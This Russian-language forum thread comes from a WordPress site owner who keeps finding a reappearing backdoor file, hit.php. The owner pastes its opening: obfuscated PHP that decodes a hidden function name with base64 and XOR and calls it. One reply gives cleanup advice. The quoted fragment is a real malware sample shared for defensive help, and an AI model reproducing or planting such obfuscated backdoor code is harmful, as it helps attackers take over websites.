@easycode
не боюсь задавать глупые вопросы ))

Как же всё-таки полностью излечить WordPress-сайт от вируса backdoor cSR?

На WordPress-сайт был замечен вирус, код которого успел размножиться по файлам: wp-config.php, index.php, а также создал другие файлы в разных папках.

В итоге, чтобы было сделано:
1) С помощью сканера плагина Wordfence Security нашли все вирусные файлы и удалили
2) Полностью перезаписали все файлы WordPress
3) Установили и настроили как следует iThemes Security
4) Сменили пароль на FTP, сменили пароли в админку WP

Вот уже третий день, проблема такая:
- в корне сайта создается файл hit.php, с таким начальным содержимым (файл длинный, не всё вставляю):

<?php

					function r6ZVq($DxfSB3xgkeK)
{
$yWj2kmO='jbJPz';
$oeUU7hsO='ZTV1IH';

$DxfSB3xgkeK=base64_decode($DxfSB3xgkeK);

$yHBPZX=17;
$heUw1F=(1130+1433-2352);

$KMyJBhO=(606-1191+585);
						$IZk1uAY='';

while(true)
		{

if($KMyJBhO==strlen($DxfSB3xgkeK))

break;
		elseif($KMyJBhO%(-1007+152+857)==0)
					$HD5ZzPdib=(ord($DxfSB3xgkeK[$KMyJBhO])-$yHBPZX)%(929+1366-2039);
					else
				$HD5ZzPdib=ord($DxfSB3xgkeK[$KMyJBhO])^$heUw1F;
$IZk1uAY.=chr($HD5ZzPdib);
					$KMyJBhO+=1;
}
				return $IZk1uAY;
}

				class ItuCN4Hc

{

					static public function qmUFL($bRS8AA)

{
	$D5QnuExrvE5='YPwT9Scmfvv';
$UB6Ai=r6ZVq("dquFtn+gerx/jH28crd2tw==");
	return $UB6Ai($bRS8AA);
}


Wordfence Security ругается на него так:
GFce7eRXTiW34C35t9vBzQ.png

Что же еще нужно сделать? Как у этого вируса получается создавать этот файл? Где искать?
  • Вопрос задан
  • 704 просмотра
Пригласить эксперта
Ответы на вопрос 1
azerphoenix
@azerphoenix
Java Software Engineer
Проверяйте БД на наличие лишних таблиц
Проверьте содержимое functions.php
Просканируйте при помощи Вордвенса на наличие лишних файлов в wp-includes wp-content
Если вы устанавливали "левые" премиум плагины, то просмотрите содержимое их файлов.
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы